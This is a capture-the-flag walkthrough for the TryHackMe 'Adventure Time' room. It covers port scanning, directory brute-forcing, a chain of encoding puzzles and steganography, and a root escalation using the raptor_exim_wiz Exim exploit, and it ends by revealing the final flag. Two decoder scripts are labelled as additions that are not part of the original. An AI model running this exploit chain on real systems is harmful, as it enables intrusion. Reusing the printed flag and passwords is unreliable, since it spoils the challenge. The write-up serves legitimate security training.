Adventure Time
Description
A CTF-based challenge with a lot of puzzles that I created for TryHackMe. It isn’t a real-world challenge, but for the puzzler it’s a nice brainteaser.
This write-up is a guide for those who got stuck along the way.
root@lab:~/THM/AdventureTime# nmap -T4 -sS -sV -sC -p- 192.168.245.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 17:10 CEST
Stats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 17:11 (0:00:22 remaining)
Nmap scan report for 192.168.245.132
Host is up (0.0010s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 1401357 Sep 21 14:51 1.jpg
| -r--r--r-- 1 ftp ftp 233977 Sep 21 14:51 2.jpg
| -r--r--r-- 1 ftp ftp 524615 Sep 21 14:51 3.jpg
| -r--r--r-- 1 ftp ftp 771076 Sep 21 14:52 4.jpg
| -r--r--r-- 1 ftp ftp 1644395 Sep 21 14:52 5.jpg
|_-r--r--r-- 1 ftp ftp 40355 Sep 21 14:53 6.jpg
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.245.129
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 58:d2:86:99:c2:62:2d:95:d0:75:9c:4e:83:b6:1b:ca (RSA)
|   256 db:87:9e:06:43:c7:6e:00:7b:c3:bc:a1:97:dd:5e:83 (ECDSA)
|_  256 6b:40:84:e6:9c:bc:1c:a8:de:b2:a1:8b:a3:6a:ef:f0 (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: You found Finn
| ssl-cert: Subject: commonName=adventure-time.com/organizationName=Candy Corporate Inc./stateOrProvinceName=Candy Kingdom/countryName=CK
| Not valid before: 2019-09-20T08:29:36
|_Not valid after: 2020-09-19T08:29:36
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
31337/tcp open Elite?
| fingerprint-strings:
|   DNSStatusRequestTCP, RPCCheck, SSLSessionReq:
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not
|   DNSVersionBindReqTCP:
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not
|     version
|     bind
|   GenericLines, NULL:
|     Hello Princess Bubblegum. What is the magic word?
|   GetRequest:
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not GET / HTTP/1.0
|   HTTPOptions:
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not OPTIONS / HTTP/1.0
|   Help:
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not HELP
|   RTSPRequest:
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not OPTIONS / RTSP/1.0
|   SIPOptions:
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not OPTIONS sip:nm SIP/2.0
|     Via: SIP/2.0/TCP nm;branch=foo
|     From: <sip:nm@nm>;tag=root
|     <sip:nm2@nm2>
|     Call-ID: 50000
|     CSeq: 42 OPTIONS
|     Max-Forwards: 70
|     Content-Length: 0
|     Contact: <sip:nm@nm>
|_    Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:50:56:24:A0:1F (VMware)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.02 seconds
root@lab:~/THM/AdventureTime# gobuster dir -u https://192.168.245.132 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://192.168.245.132
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200
[+] User Agent: gobuster/3.0.1
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2019/09/23 17:12:05 Starting gobuster
===============================================================
/candybar/ (Status: 200)
===============================================================
2019/09/23 17:12:32 Finished
===============================================================
<!-- KBQWY4DONAQHE53UOJ5CA2LXOQQEQSCBEBZHIZ3JPB2XQ4TQNF2CA5LEM4QHEYLKORUC4=== -->
BASE32 > ROT11
Always check the SSL certificate for clues.
root@lab:~/THM/AdventureTime# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 lab
192.168.245.132 adventure-time.com land-of-ooo.com

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://land-of-ooo.com/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200
[+] User Agent: gobuster/3.0.1
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2019/09/23 17:20:41 Starting gobuster
===============================================================
/yellowdog/ (Status: 200)
===============================================================
2019/09/23 17:21:10 Finished
===============================================================
root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com/yellowdog/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://land-of-ooo.com/yellowdog/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200
[+] User Agent: gobuster/3.0.1
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2019/09/23 17:23:17 Starting gobuster
===============================================================
/bananastock/ (Status: 200)
===============================================================
2019/09/23 17:23:44 Finished
===============================================================
<!-- _/..../.\_.../._/_./._/_./._/...\._/._./.\_/..../.\_..././.../_/_._.__/_._.__/_._.__ -->
MORSE (fwd slash + bck slash)
THE BANANAS ARE THE BEST!!!
root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com/yellowdog/bananastock/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://land-of-ooo.com/yellowdog/bananastock/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200
[+] User Agent: gobuster/3.0.1
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2019/09/23 17:25:54 Starting gobuster
===============================================================
/princess/ (Status: 200)
===============================================================
2019/09/23 17:26:25 Finished
===============================================================
<!--
Secrettext = 0008f1a92d287b48dccb5079eac18ad2a0c59c22fbc7827295842f670cdb3cb645de3de794320af132ab341fe0d667a85368d0df5a3b731122ef97299acc3849cc9d8aac8c3acb647483103b5ee44166
Key = my cool password
IV = abcdefghijklmanopqrstuvwxyz
Mode = CBC
Input = hex
Output = raw
-->
AES decrypt
the magic safe is accessibel at port 31337. the magic word is: ricardio
root@lab:~/THM/AdventureTime# nc adventure-time.com 31337
Hello Princess Bubblegum. What is the magic word?
ricardio
The new username is: apple-guards
root@lab:~/THM/AdventureTime# ssh apple-guards@adventure-time.com
The authenticity of host 'adventure-time.com (192.168.245.132)' can't be established.
ECDSA key fingerprint is SHA256:xbyqQlD2bMFloDbi6VJNgAlut193WbcnAnRm+ZWvRyE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'adventure-time.com,192.168.245.132' (ECDSA) to the list of known hosts.
apple-guards@adventure-time.com's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-62-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

1 package can be updated.
0 updates are security updates.

No mail.
Last login: Sat Sep 21 20:51:11 2019 from 192.168.245.129
apple-guards@at:~$
apple-guards@at:~$ cat mbox
From marceline@at Fri Sep 20 16:39:54 2019
Return-Path: <marceline@at>
X-Original-To: apple-guards@at
Delivered-To: apple-guards@at
Received: by at.localdomain (Postfix, from userid 1004)
 id 6737B24261C; Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
Subject: Need help???
To: <apple-guards@at>
X-Mailer: mail (GNU Mailutils 3.4)
Message-Id: <20190920143954.6737B24261C@at.localdomain>
Date: Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
From: marceline@at

Hi there bananaheads!!!
I heard Princess B revoked your access to the system. Bummer!
But I'll help you guys out.....doesn't cost you a thing.....well almost nothing.
I hid a file for you guys. If you get the answer right, you'll get better access.
Good luck!!!!
apple-guards@at:~$ find / -user marceline -type f 2>/dev/null
/etc/fonts/helper
apple-guards@at:~$ ls -ld /etc/fonts/helper
-rwxr-x--- 1 marceline apple-guards 16616 sep 20 17:35 /etc/fonts/helper
apple-guards@at:~$ file /etc/fonts/helper
/etc/fonts/helper: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, BuildID[sha1]=6cee442f66f3fb132491368c671c1cf91fc28332, for GNU/Linux 3.2.0, not stripped
apple-guards@at:~$ /etc/fonts/helper
======================================
BananaHead Access Pass
created by Marceline
======================================

Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha

Ready for the question?

The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse

Did you solve the puzzle?
Gpnhkse > vigenere + key = gone > Abadeer
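The three classical encodings met so far (BASE32 > ROT11 in the first HTML comment, slash-delimited Morse in the second, and Vigenère with the key "gone" in the helper binary) can all be decoded offline with the Python standard library. This is an added example, not part of the original write-up; the function and constant names are illustrative, and the inputs are the strings shown on this page.

```python
import base64
import string

# Inputs copied from this write-up.
BASE32_COMMENT = "KBQWY4DONAQHE53UOJ5CA2LXOQQEQSCBEBZHIZ3JPB2XQ4TQNF2CA5LEM4QHEYLKORUC4==="
MORSE_COMMENT = r"_/..../.\_.../._/_./._/_./._/...\._/._./.\_/..../.\_..././.../_/_._.__/_._.__/_._.__"
HELPER_CIPHERTEXT = "Gpnhkse"
HELPER_KEY = "gone"

# International Morse for A-Z, plus "!" which the hint ends with.
CODES = (".- -... -.-. -.. . ..-. --. .... .. .--- -.- .-.. -- "
         "-. --- .--. --.- .-. ... - ..- ...- .-- -..- -.-- --..")
MORSE_TABLE = dict(zip(CODES.split(), string.ascii_uppercase))
MORSE_TABLE["-.-.--"] = "!"


def rot(text, shift):
    """Rotate ASCII letters by `shift` places; other characters pass through."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def decode_base32_rot(encoded, shift):
    """BASE32 first, then a Caesar rotation (ROT11 for this page's comment)."""
    return rot(base64.b32decode(encoded).decode("ascii"), shift)


def decode_slash_morse(text):
    """'_' is a dash, '/' separates letters, '\\' separates words."""
    words = []
    for word in text.split("\\"):
        symbols = [s.replace("_", "-") for s in word.split("/") if s]
        words.append("".join(MORSE_TABLE.get(s, "?") for s in symbols))
    return " ".join(words)


def vigenere_decrypt(ciphertext, key):
    """Subtract the repeating key letter by letter, keeping the original case."""
    out, used = [], 0
    for ch in ciphertext:
        if ch in string.ascii_letters:
            shift = ord(key[used % len(key)].lower()) - 97
            out.append(rot(ch, -shift))
            used += 1  # the key only advances on letters
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    print(decode_base32_rot(BASE32_COMMENT, 11))
    print(decode_slash_morse(MORSE_COMMENT))
    print(vigenere_decrypt(HELPER_CIPHERTEXT, HELPER_KEY))
```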
======================================
BananaHead Access Pass
created by Marceline
======================================

Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha

Ready for the question?

The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse

Did you solve the puzzle? yes

What is the word I'm looking for? Abadeer

That's it!!!! You solved my puzzle
Don't tell princess B I helped you guys!!!
My password is 'My friend Finn'
marceline@at:~$ cat I-got-a-secret.txt Hello Finn, I heard that you pulled a fast one over the banana guards. B was very upset hahahahaha. I also heard you guys are looking for BMO's resetcode. You guys broke him again with those silly games? You know I like you Finn, but I don't want to anger B too much. So I will help you a little bit... But you have to solve my little puzzle. Think you're up for it? Hahahahaha....I know you are. 111111111100100010101011101011111110101111111111011011011011000001101001001011111111111111001010010111100101000000000000101001101111001010010010111111110010100000000000000000000000000000000000000010101111110010101100101000000000000000000000101001101100101001001011111111111111111111001010000000000000000000000000001010111001010000000000000000000000000000000000000000000001010011011001010010010111111111111111111111001010000000000000000000000000000000001010111111001010011011001010010111111111111100101001000000000000101001111110010100110010100100100000000000000000000010101110010100010100000000000000010100000000010101111100101001111001010011001010010000001010010100101011100101001101100101001011100101001010010100110110010101111111111111111111111111111111110010100100100000000000010100010100111110010100000000000000000000000010100111111111111111110010100101111001010000000000000001010
Spoon encoding
The magic word you are looking for is ApplePie
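Spoon is a binary encoding of Brainfuck, so the bit string in I-got-a-secret.txt can be decoded by translating the bits to Brainfuck operators and running the result. The following is an added example, not part of the original write-up; it uses the standard Spoon code table, the function names are illustrative, and SAMPLE is a short constructed program rather than the puzzle text.

```python
# Standard Spoon code table (prefix-free, so greedy matching is unambiguous).
SPOON = {"1": "+", "000": "-", "010": ">", "011": "<",
         "00100": "[", "0011": "]", "001010": ".", "0010110": ","}

# Constructed sample: Brainfuck "++++++++[>+++++++++<-]>." then 33 "+" and ".".
SAMPLE = ("1" * 8 + "00100" + "010" + "1" * 9 + "011" + "000" + "0011"
          + "010" + "001010" + "1" * 33 + "001010")


def spoon_to_bf(bits):
    """Translate a Spoon bit string to Brainfuck; whitespace is ignored."""
    ops, token = [], ""
    for b in (c for c in bits if c in "01"):
        token += b
        if token in SPOON:
            ops.append(SPOON[token])
            token = ""
        elif len(token) >= 7:
            raise ValueError("invalid Spoon token: " + token)
    if token:
        # Leftover bits usually mean the text was truncated when copied.
        raise ValueError("trailing bits: " + token)
    return "".join(ops)


def run_bf(code, stdin=b"", max_steps=5_000_000):
    """Run Brainfuck on a wrapping 30000-cell tape and return the output."""
    stack, jump = [], {}
    for i, op in enumerate(code):
        if op == "[":
            stack.append(i)
        elif op == "]":
            if not stack:
                raise ValueError("unbalanced ]")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced [")

    tape, ptr, pc, steps = [0] * 30000, 0, 0, 0
    out, inp = bytearray(), iter(stdin)
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit reached")
        op = code[pc]
        if op == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif op == ">":
            ptr = (ptr + 1) % len(tape)
        elif op == "<":
            ptr = (ptr - 1) % len(tape)
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = next(inp, 0)  # end of input reads as 0
        elif op == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif op == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return out.decode("latin-1")


def decode_spoon(bits):
    return run_bf(spoon_to_bf(bits))


if __name__ == "__main__":
    print(decode_spoon(SAMPLE))
```

To decode the puzzle itself, pass the bit string from I-got-a-secret.txt to `decode_spoon` in place of `SAMPLE`.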
root@lab:~/THM/AdventureTime# nc adventure-time.com 31337
Hello Princess Bubblegum. What is the magic word?
ApplePie
The password of peppermint-butler is: That Black Magic
marceline@at:~$ su peppermint-butler
Password:
peppermint-butler@at:/home/marceline$ cd
peppermint-butler@at:~$ ls -lah
total 116K
drwxr-x--- 4 peppermint-butler peppermint-butler 4,0K sep 23 13:56 .
drwxr-xr-x 10 root root 4,0K sep 20 20:53 ..
-rw-r--r-- 1 peppermint-butler peppermint-butler 220 apr 4 2018 .bash_logout
-rw-r--r-- 1 peppermint-butler peppermint-butler 3,7K apr 4 2018 .bashrc
-rw------- 1 peppermint-butler peppermint-butler 84K sep 21 11:44 butler-1.jpg
drwx------ 2 peppermint-butler peppermint-butler 4,0K sep 20 21:16 .cache
-rw-r----- 1 peppermint-butler peppermint-butler 28 sep 22 11:04 flag3
drwx------ 3 peppermint-butler peppermint-butler 4,0K sep 20 21:16 .gnupg
-rw-r--r-- 1 peppermint-butler peppermint-butler 807 apr 4 2018 .profile
root@lab:~/THM/AdventureTime# scp peppermint-butler@adventure-time.com:/home/peppermint-butler/butler-1.jpg .
peppermint-butler@adventure-time.com's password:
butler-1.jpg
root@lab:~/THM/AdventureTime# steghide extract -sf butler-1.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
peppermint-butler@at:~$ find / -user peppermint-butler -type f 2>/dev/null | \grep -v -e '/home\|/proc' | xargs ls -ld
-rw-r----- 1 peppermint-butler peppermint-butler 299 sep 21 11:52 /etc/php/zip.txt
-rw-r----- 1 peppermint-butler peppermint-butler 300 sep 21 11:50 /usr/share/xml/steg.txt
peppermint-butler@at:~$ find / -user peppermint-butler -type f 2>/dev/null | \grep -v -e '/home\|/proc' | xargs cat
I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum, but I don't trust her.
So I need to keep this safe.
The password of my secret file is 'ToKeepASecretSafe'

I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum, but I don't trust her.
So I need to keep this safe.
The password of my secret file is 'ThisIsReallySave'
root@lab:~/THM/AdventureTime# steghide extract -sf butler-1.jpg
Enter passphrase:
wrote extracted data to "secrets.zip".
root@lab:~/THM/AdventureTime# unzip secrets.zip
Archive: secrets.zip
[secrets.zip] secrets.txt password:
extracting: secrets.txt
root@lab:~/THM/AdventureTime# cat secrets.txt
[0200 hours][upper stairs]
I was looking for my arch nemesis Peace Master, but instead I saw that cowering little puppet from the Ice King.....gunter.
What was he up to, I don't know.
But I saw him sneaking in the secret lab of Princess Bubblegum.
To be able to see what he was doing I used my spell 'the evil eye' and saw him.
He was hacking the secret laptop with something small like a duck of rubber.
I had to look closely, but I think I saw him type in something.
It was unclear, but it was something like 'The Ice King s????'.
The last 4 letters where a blur.

Should I tell princess Bubblegum or see how this all plays out?
I don't know.......
root@lab:~/THM/AdventureTime# crunch 18 18 -t 'The Ice King s@@@@' > wordlist.txt
Crunch will now generate the following amount of data: 8682544 bytes
8 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 456976
peppermint-butler@at:~$ su gunter
Password:
gunter@at:~$ id
uid=1007(gunter) gid=1007(gunter) groups=1007(gunter),1012(gcc)
gunter@at:~$ ss -tupan
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:631 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:35972 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 [::]:46415 [::]:*
udp UNCONN 0 0 [::]:5353 [::]:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:631 0.0.0.0:*
tcp LISTEN 0 20 127.0.0.1:60000 0.0.0.0:*
tcp LISTEN 0 25 0.0.0.0:31337 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp ESTAB 0 0 192.168.245.132:22 192.168.245.129:52778
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 5 [::1]:631 [::]:*
tcp LISTEN 0 128 *:443 *:*
gunter@at:~$ find / -perm /4000 -type f 2>/dev/null
/usr/sbin/pppd
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/vmware-user-suid-wrapper
/usr/bin/sudo
/bin/ping
/bin/umount
/bin/su
/bin/fusermount
/bin/mount
Adjust the port in the exploit script: port 25 > port 60000 (the listener on 127.0.0.1:60000 in the ss output above).
root@lab:~/THM/AdventureTime# scp exim.sh gunter@adventure-time.com:/home/gunter/
gunter@adventure-time.com's password:
exim.sh
gunter@at:~$ bash exim.sh

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...

Delivering setuid payload...
220 at ESMTP Exim 4.90_1 Ubuntu Mon, 23 Sep 2019 20:12:32 +0200
250 at Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1iCSp6-00015g-FT
221 at closing connection

Waiting 5 seconds...
-rwsr-xr-x 1 root gunter 8504 sep 23 20:12 /tmp/pwned
# id
uid=0(root) gid=0(root) groups=0(root),1007(gunter),1012(gcc)
# bash
root@at:~# cd /home/bubblegum/
root@at:/home/bubblegum# ls -lah
total 120K
drwxr-x--- 18 bubblegum bubblegum 4,0K sep 23 13:57 .
drwxr-xr-x 10 root root 4,0K sep 20 20:53 ..
-rw------- 1 bubblegum bubblegum 725 sep 23 13:57 .bash_history
-rw-r--r-- 1 bubblegum bubblegum 220 apr 4 2018 .bash_logout
-rw-r--r-- 1 bubblegum bubblegum 3,7K apr 4 2018 .bashrc
drwx------ 15 bubblegum bubblegum 4,0K sep 20 17:15 .cache
drwx------ 12 bubblegum bubblegum 4,0K sep 20 08:45 .config
drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Desktop
drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Documents
drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Downloads
drwx------ 3 bubblegum bubblegum 4,0K sep 18 19:40 .gnupg
-rw------- 1 bubblegum bubblegum 3,6K sep 23 13:39 .ICEauthority
drwx------ 3 bubblegum bubblegum 4,0K sep 18 19:39 .local
drwx------ 5 bubblegum bubblegum 4,0K sep 18 21:20 .mozilla
drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Music
-rw------- 1 root root 183 sep 18 21:11 .mysql_history
drwxrwxr-x 3 bubblegum bubblegum 4,0K sep 20 19:26 nmap
drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Pictures
-rw-r--r-- 1 bubblegum bubblegum 807 apr 4 2018 .profile
drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Public
drwxrwxr-x 2 bubblegum bubblegum 4,0K sep 22 10:54 Secrets
-rwxrwx--- 1 bubblegum bubblegum 1,6K sep 21 14:41 secretServer.py
drwx------ 2 bubblegum bubblegum 4,0K sep 18 19:40 .ssh
drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Templates
drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Videos
-rw------- 1 root root 13K sep 23 13:46 .viminfo
-rw-rw-r-- 1 bubblegum bubblegum 163 sep 20 19:26 .wget-hsts
root@at:/home/bubblegum# cd Secrets/
root@at:/home/bubblegum/Secrets# ls -lah
total 12K
drwxrwxr-x 2 bubblegum bubblegum 4,0K sep 22 10:54 .
drwxr-x--- 18 bubblegum bubblegum 4,0K sep 23 13:57 ..
-rw-r----- 1 bubblegum bubblegum 3,1K sep 22 10:54 bmo.txt
root@at:/home/bubblegum/Secrets# cat bmo.txt
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░▄██████████████████████▄░░░░
░░░░█░░░░░░░░░░░░░░░░░░░░░░█░░░░
░░░░█░▄██████████████████▄░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░░░░█░█░░█░░░░░░░░░░░░█░░█░█░░░░
░░░░█░█░░░░░▄▄▄▄▄▄▄▄░░░░░█░█░░░░
░░░░█░█░░░░░▀▄░░░░▄▀░░░░░█░█░░░░
░░░░█░█░░░░░░░▀▀▀▀░░░░░░░█░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░█▌░█░▀██████████████████▀░█░▐█░
░█░░█░░░░░░░░░░░░░░░░░░░░░░█░░█░
░█░░█░████████████░░░░░██░░█░░█░
░█░░█░░░░░░░░░░░░░░░░░░░░░░█░░█░
░█░░█░░░░░░░░░░░░░░░▄░░░░░░█░░█░
░▀█▄█░░░▐█▌░░░░░░░▄███▄░██░█▄█▀░
░░░▀█░░█████░░░░░░░░░░░░░░░█▀░░░
░░░░█░░░▐█▌░░░░░░░░░▄██▄░░░█░░░░
░░░░█░░░░░░░░░░░░░░▐████▌░░█░░░░
░░░░█░▄▄▄░▄▄▄░░░░░░░▀██▀░░░█░░░░
░░░░█░░░░░░░░░░░░░░░░░░░░░░█░░░░
░░░░▀██████████████████████▀░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░▐██░░░░░░░░░░░░██▌░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░

Secret project number: 211243A
Name opbject: BMO
Rol object: Spy

In case of emergency use resetcode: tryhackme{Th1s1s4c0d3F0rBM0}

-------

Good job on getting this code!!!!
You solved all the puzzles and tried harder to the max.
If you liked this CTF, give a shout out to @n0w4n.